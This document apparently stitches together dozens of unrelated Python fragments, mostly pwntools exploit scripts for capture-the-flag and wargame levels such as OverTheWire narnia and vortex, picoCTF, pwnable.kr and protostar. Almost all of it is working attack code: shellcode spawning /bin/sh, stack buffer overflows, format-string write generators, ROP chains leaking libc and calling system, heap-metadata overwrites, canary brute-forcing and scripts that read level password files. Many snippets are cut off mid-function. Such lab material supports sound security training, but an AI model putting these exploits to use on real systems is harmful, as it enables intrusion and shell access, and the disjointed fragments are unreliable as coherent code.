flag = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAljLGQ=" flag = b64decode(flag) def enc(s, e=9517, n=41117): new_s = [] for c in s: new_s.append(pow(ord(c), e, n)) return new_s solution = "" flag_i = 0 while flag_i < len(flag): for i in range(32, 128): p = p32(enc(chr(i))[0]).replace('\x00', '') if "\x88" in p: for j in p: print ord(j), print good = True for j in range(len(p)): if p[j] != flag[flag_i + j]: good = False break if good: solution += p print(solution) break
"\xe0\xff\xbd\x27"\ "\xd7\xff\x0f\x24"\ "\x27\x78\xe0\x01"\ "\x21\x20\xef\x03"\ "\xe8\xff\xa4\xaf"\ "\xec\xff\xa0\xaf"\ "\xe8\xff\xa5\x23"\ "\xab\x0f\x02\x24"\ "\x0c\x01\x01\x01"\ "/bin/sh\x00" nop = "\xff\xff\x06\x28" shellcode = nop * 100 + shellcode payload = b"GET %\x00A" pattern = bytearray(cyclic(1000)) read_buffer = 0x7fffe974 shellcode_offset = 60 # must be a multple of 4 shellcode_addr = read_buffer + shellcode_offset + 4 * 40 pattern[36:40] = p.p32(shellcode_addr) pattern[41] = b"\x00" # end urldecode loop payload += pattern payload = bytearray(payload) payload[shellcode_offset:shellcode_offset+len(shellcode)] = shellcode r = p.remote("breizhctf.serveur.io", 4242) r.send(payload) r.interactive()
def fmtstr_payload(offset, writes, numbwritten=0, write_size='short'): # 'byte' : (number, step, mask, format, decalage) config = { 32: { 'byte': (4, 1, 0xff, 8), 'short': (2, 2, 0xffff, 16), 'int': (1, 4, 0xffffffff, 32), }, 64: { 'byte': (8, 1, 0xff, 8), 'short': (4, 2, 0xffff, 16), 'int': (2, 4, 0xffffffff, 32) } } if write_size not in ['byte', 'short', 'int']: log.error("write_size must be 'byte', 'short' or 'int'") number, step, mask, decalage = config[context.bits][write_size] def _split_write(what, where, mask, decalage, step): # I don't know exactly why I need this, is it signed value? # I failed to write things when I deleted this at some strange point. write_value_limit = (1 << (decalage - 1)) - 1 if mask != 0xff else 0xff value = what & mask this_where = where this_writes = {} while True: if value >= write_value_limit: values = _split_write(value, this_where, mask >> 8, decalage >> 1, step >> 1) this_writes.update(values) else: this_writes[this_where] = (value, step) what >>= decalage value = what & mask this_where += step if not what: break return this_writes splitted_writes = {} for where, what in writes.items(): splitted_writes.update(_split_write(what, where, mask, decalage, step)) #for where, what in splitted_writes.items(): # print("write {} at {}".format(hex(what[0]), hex(where))) def _get_formatz(size): if size == 1: return 'hh' elif size == 2: return 'h' elif size == 4: return '' else: raise Exception("internal error, write size wrong") payload = "" blank_chars = 0 write_addr_seq = [] for where, what_thing in sorted(splitted_writes.items(), key=lambda x: x[1][0]): what = what_thing[0] what_size = what_thing[1] need_write_chars = what - numbwritten if need_write_chars: payload += "%{}c".format(need_write_chars) formatz = _get_formatz(what_size) payload += "%{}$" + formatz + "n" numbwritten += need_write_chars blank_chars += 2 write_addr_seq.append(where) if len(payload) < 8: payload = payload.ljust(8, 'a') buf_written = len(payload) addr_size = 8 if context.bits == 64 else 4 filled_len = ((buf_written - 1) & ~(addr_size - 1)) + addr_size ok = False now_filled_len = filled_len while not ok: real_index_in_chars = 0 index_start = offset + (now_filled_len / addr_size) index_end = offset + (now_filled_len / addr_size) + len(splitted_writes) for i in range(index_start, index_end): real_index_in_chars += len(str(i)) buf_written += real_index_in_chars - blank_chars blank_chars = real_index_in_chars now_filled_len = ((buf_written - 1) & ~(addr_size - 1)) + addr_size if now_filled_len == filled_len: ok = True filled_len = now_filled_len payload += 'a' * (now_filled_len - buf_written) write_indexes = [] for i in range(index_start, index_end): write_indexes.append(i) payload = payload.format(*write_indexes) for where in write_addr_seq: payload += p64(where) if context.bits == 64 else p32(where) return payload
#! /usr/bin/env python3 import pwn s = pwn.ssh('narnia2', 'narnia.labs.overthewire.org', password='******', port=2226) ShellCode = pwn.asm( pwn.shellcraft.i386.linux.setreuid(14003) + pwn.shellcraft.i386.linux.sh()) n = pwn.cyclic_find(0x6261616b) arg = (b'\x90' * n + ShellCode)[-n:] + pwn.p32(0xffffddc0 + 20) p = s.process([b'/narnia/narnia2', arg]) p.sendline(b"cat /etc/narnia_pass/narnia3") print(p.recvline()) s.close()
#!/usr/bin/python import pwn payload = "" payload += "A"*76 # ret gets overwritten at offset 76 into our buffer payload += pwn.p32(0x80483f4) # the win function is located at 0x80483f4 p = pwn.process("bin/stack4") p.sendline(payload) print p.recvall()
#! /usr/bin/env python3 import pwn s = pwn.ssh('narnia0', 'narnia.labs.overthewire.org', password='******', port=2226) p = s.process('/narnia/narnia0') p.sendline(b"A" * pwn.cyclic_find(0x61616166) + pwn.p32(0xdeadbeef)) p.sendline(b"cat /etc/narnia_pass/narnia1") p.recvuntil("val: 0xdeadbeef\n") print(p.recvline()) p.close() s.close()
add_product('a', 10) add_product('b', 11) add_product('c', 12) add_product('d', 13) add_product('e', 14) add_product('f', 15) manage_product('a') manage_product('b') manage_product('c') manage_product('d') manage_product('e') manage_product('f') remove_product('d') buf = '' buf += pwn.p32(9) # price buf += pwn.p32(0xdeadbeef) # next buf += pwn.p32(0xdeadbeef) # prev buf += pwn.p32(0x804C1C0) # parent buf += pwn.p32(0x804C3E0 - 24) # left buf += pwn.p32(0x804C3E0 - 24) # right buf += pwn.cyclic(8) + 'BBBB' profile(buf) r.recvuntil('Input: ') r.send('4\n') print r.recvuntil('Input: ') r.send('4\n') print r.recvuntil('Input: ')
r.send(data) r.recvuntil('\n') ## STEP 1 - connect and leak GOT r = connect() pwn.log.info("Leaking GOT") # Create duplicate note, thereby free()ing note A note_add(r, 'a', False) note_add(r, 'b') time.sleep(0.1) # Create a note structure n = "" n += pwn.p32(0) # no next note n += pwn.p32(2137) # ID 2137 n += pwn.p32(1) # data length 1 n += pwn.p32(GOT_FREE) # data pointing to free@got n += "a" * 40 + "\x00" # timestring # Add a new note with n as data, thereby overflowing the A note memory with # our crafted structure note_add(r, n, False) # Show notes, parse note a content as free@libc menu(r, 1) data = r.recvuntil('\n') for line in data.split('\n'): note = line.split()[2] note = note.split(':')[1] free = pwn.u32(note[:4])
print("No address found") address = address_match.groups()[0] address_val = int(address, 16) p.send_raw(b'\n') time.sleep(sleep_time) out = recv_all_if_exists(p) print(out.decode("ISO-8859-1")) format_string = create_format_string(address_val, offset=1).encode() # format_string = r'%.2044x%1\$hn%.33820x%2\$hn'.encode() # tweet(pwn.p32(0x8048c20) + format_string, p) # tweet(pwn.p32(address_val)*4, p) tweet(pwn.p32(address_val + 2) + pwn.p32(address_val) + format_string, p) # tweet(pwn.p32(0x08048c20) + b"%08x.%08x.%08x", p) time.sleep(sleep_time) p.send_raw(b'\n') time.sleep(sleep_time) out = recv_all_if_exists(p) print(out.decode("ISO-8859-1")) p.send_raw(b'2\n') time.sleep(sleep_time) p.send_raw(b'2\n') time.sleep(sleep_time) out = recv_all_if_exists(p) print(out.decode("ISO-8859-1"))
def random_bytes(): while True: raw = random.randint(1, 0xffffffff) if raw not in cs: return ''.join(['.byte 0x%02x;' % ord(i) for i in pwn.p32(raw)])
#!/usr/bin/python import subprocess import pwn for i in range(1, 256): b = 'a' * 32 + 'w' + 'r' + 'v' + 'W' + 'aaaa' + pwn.p32(0x000007ed, endian = 'little') print b a = subprocess.Popen(["printf", '36\n{}\n'.format(b)], stdout = subprocess.PIPE) b = subprocess.call(['./vuln'], stdin = a.stdout ) print b canary value = 'wrvW' echo '36 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwrvW'
from zio import * import pwn # p = zio("./pwn") p = zio(("192.168.5.56",8888)) # p.read_until("\n") p.write("a"*(0x60)+pwn.p32(0x0804A024)+pwn.p32(0x0804A024)) # p.read_until("e1 : ") # p.write(str(0x528E6)) # p.read_until("e2 : ") # p.write(str(0xCC07C9)) p.interact()
b2_address = int(m.group(2), 16) pwn.log.info("Buffers at {:08x} and {:08x}".format(b1_address, b2_address)) # 16 bytes of local buffer, 9 bytes of canary, 0xc bytes of local crud OVERFLOW_SIZE = 16 + 9 + 0xc shellcode = pwn.asm(pwn.shellcraft.i386.linux.sh()) if '\x00' in shellcode: raise Exception("Null byte in shellcode.") if len(shellcode) > OVERFLOW_SIZE: raise Exception("Shellcode too long.") b1 = "" b1 += shellcode.rjust(OVERFLOW_SIZE, 'a') b1 += pwn.p32(0xdeadbeef) # ebp control b1 += pwn.p32(b1_address) # eip control b1 += pwn.p32(CANARY) # copy dest address b1 += pwn.p32(b2_address) # copy source address b2 = b1[16:] p.sendline(b1) p.sendline(b2) _ = p.recvline() _ = p.recvline() _ = p.recvline() _ = p.recvline() pwn.log.info("Got shell!") p.interactive()
DEBUG = False if DEBUG: p = pwn.process('./gunzipasaservice') else: p = pwn.remote(HOST, PORT) pwn.context.log_level = 'DEBUG' read_plt = 0x08049040 execl_plt = 0x080490B0 pop_pop_pop_ret = 0x08049479 bss = 0x0804C048 payload = b'A' * 0x418 payload += pwn.p32(read_plt) payload += pwn.p32(pop_pop_pop_ret) payload += pwn.p32(0) payload += pwn.p32(bss) payload += pwn.p32(8) payload += pwn.p32(execl_plt) payload += b'AAAA' payload += pwn.p32(bss) payload += pwn.p32(0) payload = gzip.compress(payload) assert len(payload) <= 0x200 payload = payload.ljust(0x200, b'\x00') p.send(payload)
#!/usr/bin/env python3 import pwn host, port = "mercury.picoctf.net", 33411 flag = [] flag_ascii = [] flag_offset_dword = 15 pwn.context.log_level = 'critical' bad_chars = ['\x00', 'Î', 'ÿ'] for i in range(flag_offset_dword, 25): s = pwn.remote(host, port) s.sendlineafter("2) View my portfolio\n", "1") s.sendlineafter("What is your API token?\n", f'%{i}$p') s.recvuntil("Buying stonks with token:\n") response = s.recvline() try: flag_so_far = pwn.p32(int(response.decode(), base=16)) flag_ascii += flag_so_far except SyntaxError: pass for i in flag_ascii: flag.append(str(chr(int(i)))) print(''.join(flag).replace('\x00', '').replace('Î', '').replace( 'ÿ', '')) # picoCTF{I_l05t_4ll_my_m0n3y_a24c14a6}
def zero_send(data): magic = '\xdd' data_len = p32(len(data), endian='big') data_crc32 = p32(crc.crc_32(data), endian='big') payload = magic + data_len + data + data_crc32 send(payload)
def main(): p = get_process() # Stage 1 # Initial payload payload = b"A" * ExploitInfo.offset_buf_to_eip ropchain = p32(ExploitInfo.puts_plt) ropchain += p32(ExploitInfo.main_func) ropchain += p32(ExploitInfo.puts_got) payload = payload + ropchain p.clean() p.sendline(payload) # Take 4 bytes of the output leak = p.recv(4) puts_addr = u32(leak) log.info("Here the leak : %s" % binascii.hexlify(leak)) log.info("puts is at : 0x%x" % puts_addr) p.clean() # Calculate libc base libc_base = puts_addr - ExploitInfo.offset_puts log.info("libc base : 0x%x" % libc_base) # Stage 2 # Calculate offsets system_addr = libc_base + ExploitInfo.offset_system + 3 # +3 to avoid null byte on address """ Part of system: 0xf7e0d200 <+0>: sub esp,0xc 0xf7e0d203 <+3>: mov eax,DWORD PTR [esp+0x10] 0xf7e0d207 <+7>: call 0xf7f0737d """ padding = '\x90' * 0xc # cause we jump from first instruction exit_addr = libc_base + ExploitInfo.offset_exit binsh_addr = libc_base + ExploitInfo.offset_str_bin_sh log.info("system is at : 0x%x" % system_addr) log.info("/bin/sh is at : 0x%x" % binsh_addr) log.info("exit is at : 0x%x" % exit_addr) # Build 2nd payload payload2 = b"A" * ExploitInfo.offset_buf_to_eip ropchain2 = p32(system_addr) ropchain2 += padding ropchain2 += p32(exit_addr) # Optional: Fix disallowed character by scanf by using p32(binsh_addr+5) # Then you'll execute system("sh") ropchain2 += p32(binsh_addr) payload2 = payload2 + ropchain2 if b'\x00' in payload2: log.warn('WARNING: null in payload\n' 'Exploit may fail.') p.sendline(payload2) log.success("Here comes the shell!") p.clean() p.interactive()
r2.cmd('dbm product_key 0x976') r2.cmd('dc') checksum = int(r2.cmd('dr eax'),16) close() return checksum def concat_key(key): assert type(key) is list key_str = '' for i in range(0, len(key), 4): key_str += key[i] + key[i+1] + key[i+2] + key[i+3] + '-' return key_str.strip('-') checksum = p32(calculate_checksum('i-am-misakiakeno')) goal = b'i-am-misakiakeno' + checksum discovered = 0 key = ['A']*32 # NOTE: This ended up being WAY too slow... for x in product(alphabet, alphabet): # Update our key key[discovered] = x[0] key[discovered+1] = x[1] out = show_decode(concat_key(key)) if out[int(discovered/2)] == goal[int(discovered/2)]: discovered += 2
import pwn # mem address of libc and /bin/sh # got from 'p system' and 'searchmem "/bin/sh" respectively in gdb system_addr = 0xb7e61310 binsh_addr = 0xb7f83d4c p = pwn.process('/levels/lab05/lab5C') print(p.recv(100)) exploit_str = 'a' * 156 exploit_str += pwn.p32(system_addr) exploit_str += 'SH!T' # 4 bytes of junk exploit_str += pwn.p32(binsh_addr) p.sendline(exploit_str) p.interactive()
p.sendline(payload1) prompt = p.read() payload = b'' payload += ('D' * 32).encode() payload += canary.encode() payload += chr(char).encode() p.send_raw(payload) message = p.read() if re.search(b'Smashing', message) is None: canary += chr(char) if len(canary) == 4: p.close() finished = True break p.close() p = pwn.tubes.process.process(["./vuln"], shell=True) p.sendline(b'64') prompt = p.read() print(prompt) payload = ('D' * 32).encode() payload += canary.encode() payload += pwn.p32(win_addr) * 5 p.sendline(payload) prompt = p.read() print(prompt)
elf = pwn.ELF('./program') plt_puts = elf.symbols['plt.puts'] got_puts = elf.symbols['got.puts'] main = elf.symbols['main'] ret = 0x8049022 # gadgets try ROPgadget pwn.log.success('plt.puts: {}'.format(hex(plt_puts))) pwn.log.success('got.puts: {}'.format(hex(got_puts))) pwn.log.success('main: {}'.format(hex(main))) pwn.log.success('ret: {}'.format(hex(ret))) payload = '' payload += 'A' * 172 payload += pwn.p32(ret) payload += pwn.p32(plt_puts) payload += pwn.p32(main) payload += pwn.p32(got_puts) open('payload-step1.txt', 'w').write(payload) p = elf.process() line = p.recvline() p.sendline(payload) line = p.recvline() open('leak.txt', 'w').write(line.strip()) # try hexdump here addr = hex(pwn.u32(line.strip()[0:4])) leaked_puts_got = int(addr, 16) """
def getPass(shell): # this function prints the password print('The password for the next level is...') shell.sendline('cat /etc/narnia*/narnia' + str(level + 1)) def readCode(shell): # this function downloads the narnialevel.c file and displays it # and at the end removes the .c file code = shell.download_data('/narnia/' + user + '.c') shell.download_file('/narnia/' + user + '.c') log.info('The code for this level is') print(code) subprocess.call(['rm', user + '.c']) # context=(arch='i386', os='linux') sh = conn() readCode(sh) exe = sh.run('/narnia/' + user) exe.recvuntil(':') # the payload that is to be sent payload = 'a' * 20 + p32(0xdeadbeef) exe.sendline(payload) # the flag is gotten flag = getPass(exe) # puts it into interactive mode so you can play around exe.interactive()
def set_ebx(value): return p32(0x080481ec)\ + p32(value)
import pwn import re puts_addr = 0xf7e3e290 system_addr = 0xf7e12420 offset = puts_addr - system_addr elf = pwn.ELF('./vuln') p = elf.process() prompt = p.recv() # print prompt puts = int(re.findall("puts: (.*)", prompt)[0], 16) bin_bash = int(re.findall("useful_string: (.*)", prompt)[0], 16) print "==================" print puts print bin_bash system = puts - offset payload = 'a' * 160 payload += pwn.p32(system) payload += "JUNK" payload += pwn.p32(bin_bash) p.sendline(payload) p.interactive()
def set_eax(value): return p32(0x080c28c6)\ + p32(value)
#!/usr/bin/env python3 import pwn s = pwn.ssh('login', 'host.com', password='******', port=12345) s.download("./exp2") shell_func_addr = pwn.ELF('./exp2').symbols['shell'] print('Shell func addr :' + str(hex(shell_func_addr))) p = s.process('exp2') p.sendline((b'A' * 128) + pwn.p32(shell_func_addr)) p.sendline(b'cat .passwd') print(p.recvline()) print(p.recvline()) print(p.recvline()) print(p.recvline()) print(p.recvline()) print(p.recvline()) p.close()
def set_ecx(value): return p32(0x080e3c2a)\ + p32(value)
#!/usr/bin/env python import pwn ssh = pwn.ssh(host='pwnable.kr', user='******', password='******', port=2222) attack = ssh.process(executable='./passcode') got_fflush = 0x0804a004 addr_before_sys = '134514147' payload = 96 * 'a' payload += pwn.p32(got_fflush) payload += addr_before_sys print attack.recv() attack.sendline(payload) flag = attack.recvall() print flag
def set_edx(value): return p32(0x080551ca)\ + p32(value)
SHELL_CODE = b'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78' SHELL_LEN = len(SHELL_CODE) p = pwn.remote('host',12345) ### leak buffer addr p.recvuntil(b'dump:') p.sendline(pwn.cyclic(16)) p.recvline() SHELL_ADDR = p.recvline()[0:10] p.recvuntil(b'(y/n):') p.sendline(b'y') ### send payload p.recvuntil(b'dump:') n = pwn.cyclic_find(0x62616170) payload = SHELL_CODE payload += b'A'*(n - SHELL_LEN + 4) payload += pwn.p32(int(SHELL_ADDR,0)) payload += b'A'*8 p.sendline(payload) print(b'payload: ' + payload) ### get shell p.recvuntil(b'(y/n):') p.sendline(b'n') p.interactive()
def set_mem(addr, value): return set_edx(addr)\ + set_eax(value)\ + p32(0x0808ee3d)
#!/usr/bin/env python3 import pwn s = pwn.ssh('login', 'host', password='******', port=12345) p = s.process('exp4') p.recvuntil(b'Enter your name:') print(b'Enter your name:') print(b'Sending payload ...') p.sendline(b'\x08' * 4 + pwn.p32(0xbffffabc)) p.interactive()
def syscall(): return p32(0x08049449)
def p32(h): return pwn.p32(h)
#!/usr/bin/python import pwn #[0x08048370]> afl #0x080482e0 3 48 sym._init #0x08048320 1 6 loc.imp.__gmon_start__ #0x08048330 1 6 sym.imp.gets #0x08048340 1 6 sym.imp.__libc_start_main #0x08048350 1 6 sym.imp.printf #0x08048360 1 6 sym.imp.puts #0x08048370 1 33 entry0 #0x080483a0 6 85 sym.__do_global_dtors_aux #0x08048400 4 35 sym.frame_dummy #0x08048424 1 20 sym.win #0x08048438 3 65 sym.main #0x08048480 1 5 sym.__libc_csu_fini #0x08048490 4 90 sym.__libc_csu_init #0x080484ea 1 4 sym.__i686.get_pc_thunk.bx #0x080484f0 4 42 sym.__do_global_ctors_aux payload = "" payload += "A"*64 payload += pwn.p32(0x08048424) p = pwn.process("bin/stack3") p.sendline(payload) print p.recvall()
s.send(data) return s s = connect('') s.recvuntil('Set-Cookie:') cookies = s.recvuntil('\n') sid = cookies.split('=')[1].strip() pwn.log.info("SID: {}".format(sid)) s = connect('action=1&user=admin&pass=hardcodedpass!', sid=sid) s.recvall() s = connect('', sid=sid) data = s.recvall() if not 'Surprisingly' in data: print data raise Exception() # 7ffd6000-7fff7000 rwxp 00000000 00:00 0 [stack] buf = "lang=" buf += 'b'*112 buf += pwn.p32(0x7fff6b88) buf += SHELLCODE s = connect('action=2', sid=sid, data=buf) s.recvall() s = connect('', sid=sid, gdb=True)
import pwn import re addr = "vortex.labs.overthewire.org" port = "5842" r = pwn.remote(addr,port) num = [] for i in range(4): num += [pwn.u32(r.recvn(4))] r.send(pwn.p32(sum(num) & 0xFFFFFFFF)) rcv = r.recvall() passwd = re.findall("Password: (.*)", rcv) print passwd[0]